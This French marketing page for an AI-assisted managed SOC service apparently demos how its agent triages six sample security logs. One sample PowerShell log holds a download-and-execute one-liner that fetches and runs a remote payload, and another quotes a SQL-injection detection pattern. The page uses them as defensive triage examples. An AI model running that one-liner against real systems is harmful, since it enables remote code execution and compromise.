Retour SOC managé

    Démo SOC interactive — voyez l'IA trier en live

    Six logs réels. Cliquez Analyser. L'agent IA M-KIS classifie en <1s : faux_positif / suspect / critique avec MITRE ATT&CK.

    Logs analysés
    0/6
    Faux positifs filtrés
    0
    Vraies alertes remontées
    0
    wazuh-soc.m-kis.fr / live triage
    $ tail -f /var/log/wazuh/alerts.json | mkis-ai-triage
    [01]2026-08-15 03:42:11·srv-prod / sshd
    Aug 15 03:42:11 srv-prod sshd[8412]: Failed password for root from 185.220.101.42 port 49882 ssh2 (15 attempts in 60s)
    [02]2026-08-15 14:22:33·api.example.com / ModSecurity
    [Wed Aug 15 14:22:33] [error] [client 203.0.113.45] ModSecurity: Warning. Pattern match "(?i)(UNION.*SELECT|OR\s+1=1)" at ARGS:id. [hostname "api.example.com"] [uri "/api/v1/users"] [unique_id "ZsjQYUgABhYAAB"]
    [03]2026-08-15 09:14:22·workstation-fr-12 / PAM
    Aug 15 09:14:22 workstation-fr-12 PAM: authentication failure; logname=alice uid=0 euid=0 tty=tty1 ruser= rhost=  user=alice (1 attempt then success at 09:14:30)
    [04]2026-08-15 11:03:55·firewall-edge
    Aug 15 11:03:55 firewall: TCP probe from 198.51.100.42 (shodan.io) to dst 203.0.113.10 dport 443 — banner grab only, no exploit
    [05]2026-08-15 23:47:18·idp-keycloak
    Aug 15 23:47:18 idp-keycloak: SUCCESS_AUTHENTICATION [email protected] ip=41.207.16.88 country=BJ ua="curl/8.4.0" (admin usually connects from FR)
    [06]2026-08-15 17:09:04·Microsoft-Windows-PowerShell/Operational
    [Microsoft-Windows-PowerShell/Operational EventID 4104] ScriptBlock: IEX ((New-Object Net.WebClient).DownloadString('http://185.220.101.42:8080/payload.ps1'))

    Collez votre propre log

    Testez l'agent IA M-KIS sur un événement de votre infrastructure. Aucun stockage, classification éphémère.

    0 / 2000 caractèresLimité à 10 analyses/heure/IP. Ne collez pas de données sensibles non anonymisées.

    Comment ça marche en vrai

    Ce que vous venez de voir, en chaîne complète, branché sur votre SI.

    1. Wazuh capte

    Agents endpoints (Linux, Windows, macOS) + capteurs réseau remontent syslog, journald, Windows Events, intégrité fichier, audits PCI/CIS — tout dans le SIEM Wazuh.

    2. L'agent IA classifie

    Modèle léger, prompt structuré, contexte client (IP internes, comportements habituels, runbook). Verdict en <1s avec mapping MITRE ATT&CK et explication courte en français.

    3. L'humain reçoit l'essentiel

    Vraies alertes envoyées sur Mattermost / SMS / runbook. Faux positifs silencés mais loggués. L'analyste se concentre sur ce qui compte vraiment.

    Mais en prod, ça donne quoi ?

    Chiffres typiques observés sur les SOC managés M-KIS — ordres de grandeur, pas garanties contractuelles.

    Volume traité
    8–12k
    évents / jour pour 100 endpoints
    Filtrage IA
    92–96 %
    d'alertes classées faux positif
    Latence p95
    < 1s
    log → verdict IA
    Coût classification
    ~ 0,001 €
    par évent (modèle open source via OpenRouter)

    Vous voulez le détail technique : prompt, fenêtre de contexte, gestion des hallucinations, comparaison Wazuh seul vs Wazuh + IA ?

    Lire la deep-dive technique

    Convaincu ? On vous installe ça en 2 semaines.

    Setup, agents endpoints, intégration ticketing, runbooks, IA branchée sur votre contexte. Hébergé en France ou on-premise — au choix.